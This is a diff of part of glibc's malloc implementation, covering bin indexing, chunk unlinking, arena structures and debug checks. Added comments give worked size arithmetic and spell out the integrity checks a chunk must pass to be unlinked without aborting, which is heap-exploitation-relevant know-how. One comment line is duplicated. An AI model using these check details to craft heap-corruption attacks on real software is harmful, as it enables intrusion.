+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
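+
+/* Worked examples of the indexing macros above (illustrative only), for
+   chunk sizes (not request sizes), assuming the 64-bit defaults SIZE_SZ == 8
+   and SMALLBIN_WIDTH == 16, so MIN_LARGE_SIZE == 64 * 16 == 1024:
+
+     bin_index (32)   == smallbin_index (32)      == (32 >> 4)        ==  2
+     bin_index (1008) == smallbin_index (1008)    == (1008 >> 4)      == 63
+     bin_index (1024) == largebin_index_64 (1024) == 48 + (1024 >> 6) == 64
+     bin_index (4096) == largebin_index_64 (4096) == 91 + (4096 >> 9) == 99
+*/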
+
+/* Take a chunk off a bin list.  */
+static void
+unlink_chunk (mstate av, mchunkptr p)
+{
+  if (chunksize (p) != prev_size (next_chunk (p)))
+    malloc_printerr ("corrupted size vs. prev_size");
+
+  mchunkptr fd = p->fd;
+  mchunkptr bk = p->bk;
+
+  if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
+    malloc_printerr ("corrupted double-linked list");
+
+  fd->bk = bk;
+  bk->fd = fd;
+  if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
+    {
+      if (p->fd_nextsize->bk_nextsize != p
+	  || p->bk_nextsize->fd_nextsize != p)
+	malloc_printerr ("corrupted double-linked list (not small)");
+
+      if (fd->fd_nextsize == NULL)
+	{
+	  if (p->fd_nextsize == p)
+	    fd->fd_nextsize = fd->bk_nextsize = fd;
+	  else
+	    {
+	      fd->fd_nextsize = p->fd_nextsize;
+	      fd->bk_nextsize = p->bk_nextsize;
+	      p->fd_nextsize->bk_nextsize = fd;
+	      p->bk_nextsize->fd_nextsize = fd;
+	    }
+	}
+      else
+	{
+	  p->fd_nextsize->bk_nextsize = p->bk_nextsize;
+	  p->bk_nextsize->fd_nextsize = p->fd_nextsize;
+	}
+    }
+}
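+
+/* Illustration of the checks above: to unlink a chunk P from a regular
+   (doubly linked) bin without aborting, all of the following must hold:
+
+     chunksize (P) == prev_size (next_chunk (P))   size vs. prev_size
+     P->fd->bk == P  &&  P->bk->fd == P            "safe unlinking"
+
+   and, for large chunks that carry nextsize pointers,
+   P->fd_nextsize->bk_nextsize == P and P->bk_nextsize->fd_nextsize == P
+   as well; otherwise malloc_printerr terminates the process.  */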
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
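+
+/* Note (relying on bin_at, which is defined earlier in this file): bin 1's
+   list head is not a real chunk.  bin_at offsets into M->bins so that the
+   bins[0]/bins[1] pair acts as the fd/bk of a fake chunk header inside the
+   arena itself.  A freed chunk that does not go to the tcache or a fastbin,
+   and is not merged into top, is typically linked into this list first and
+   only sorted into its small/large bin on a later malloc pass.  */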
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during traversals.  The bits are NOT always
+    be skipped over during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
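+
+/* Worked example: for bin index i == 70, idx2block (70) == 70 >> 5 == 2 and
+   idx2bit (70) == 1U << (70 & 31) == 1U << 6 == 0x40, so mark_bin sets bit
+   0x40 of binmap[2].  malloc only trusts a clear bit (bin definitely
+   empty); a set bit merely means the bin may be non-empty.  */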
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
+
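+/* Worked example (64-bit, SIZE_SZ == 8; request2size is defined earlier in
+   this file and pads a request up to a 16-byte-aligned chunk size):
+
+     MAX_FAST_SIZE        == 80 * 8 / 4       == 160
+     request2size (160)   == 176 (0xb0)
+     fastbin_index (0xb0) == (0xb0 >> 4) - 2  == 9
+     NFASTBINS            == 10
+
+   so fastbinsY[] has ten entries covering chunk sizes 0x20 .. 0xb0,
+   although by default only sizes up to global_max_fast (see below) are
+   actually used.  */
+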
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks in the main arena.
+   Since do_check_malloc_state () checks this, we call malloc_consolidate ()
+   before changing max_fast.  Note other arenas will leak their fast bin
+   entries if max_fast is reduced.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+
+static inline INTERNAL_SIZE_T
+get_max_fast (void)
+{
+  /* Tell the GCC optimizers that global_max_fast is never larger
+     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
+     _int_malloc after constant propagation of the size parameter.
+     (The code never executes because malloc preserves the
+     global_max_fast invariant, but the optimizers may not recognize
+     this.)  */
+  if (global_max_fast > MAX_FAST_SIZE)
+    __builtin_unreachable ();
+  return global_max_fast;
+}
+
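+/* With the default mallopt setting (DEFAULT_MXFAST, defined earlier, is
+   64 * SIZE_SZ / 4 == 128 on 64-bit), malloc_init_state below calls
+   set_max_fast (128), which stores (128 + 8) & ~15 == 128 in
+   global_max_fast.  In other words, only chunks of size 0x20 .. 0x80
+   (fastbin indices 0 .. 6) take the fastbin path by default, even though
+   NFASTBINS is larger.  */
+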
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+/*
+   have_fastchunks indicates that there are probably some fastbin chunks.
+   It is set true on entering a chunk into any fastbin, and cleared early in
+   malloc_consolidate.  The value is approximate since it may be set when there
+   are no fastbin chunks, or it may be clear even if there are fastbin chunks
+   available.  Given its sole purpose is to reduce the number of redundant calls to
+   malloc_consolidate, it does not affect correctness.  As a result we can safely
+   use relaxed atomic accesses.
+ */
+
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Set if the fastbin chunks contain recently inserted free blocks.  */
+  /* Note this is a bool but not all targets support atomics on booleans.  */
+  int have_fastchunks;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
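+
+  /* 254 pointers on this layout: bins 1 .. 127 each need an fd and a bk,
+     and bin 0 does not exist, hence NBINS * 2 - 2.  bin_at (defined
+     earlier) treats each fd/bk pair as if it were the tail of a chunk
+     header, which is why a bin's list head (e.g. the unsorted bin's) lives
+     inside the arena rather than on the heap.  */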
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunks are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
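+
+/* For reference, the usual 64-bit defaults behind the initializers above
+   (the macros are defined earlier in this file or in malloc.h, so treat the
+   concrete numbers as the common configuration rather than a guarantee):
+   DEFAULT_MMAP_THRESHOLD and DEFAULT_TRIM_THRESHOLD are both 128 * 1024,
+   DEFAULT_MMAP_MAX is 65536, and with tcache enabled TCACHE_MAX_BINS is 64
+   and TCACHE_FILL_COUNT is 7, giving tcache_max_bytes == tidx2usize (63)
+   == 1032, i.e. requests up to 0x408 bytes (chunk sizes up to 0x410) are
+   tcache-eligible.  */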
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called from ptmalloc_init () or from _int_new_arena ()
+   when creating a new arena.
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+/* This function is called from the arena shutdown hook, to free the
+   thread cache (if it exists).  */
+static void tcache_thread_shutdown (void);
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (next_chunk (p)) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* Check the arena is initialized. */
+  assert (av->top != 0);
+
+  /* No memory has been allocated yet, so doing more tests is not possible.  */
+  if (av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
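+/* Rough orientation for the code below, using the common defaults noted
+   above: with mp_.mmap_threshold at its initial 128 KiB, a padded request
+   nb >= 0x20000 is served directly by mmap (subject to n_mmaps_max) and
+   never touches av->top; smaller requests grow the heap instead, via
+   grow_heap/new_heap for non-main arenas or via MORECORE (sbrk) for the
+   main arena, with mmap as a fallback when sbrk fails.  */
+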
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
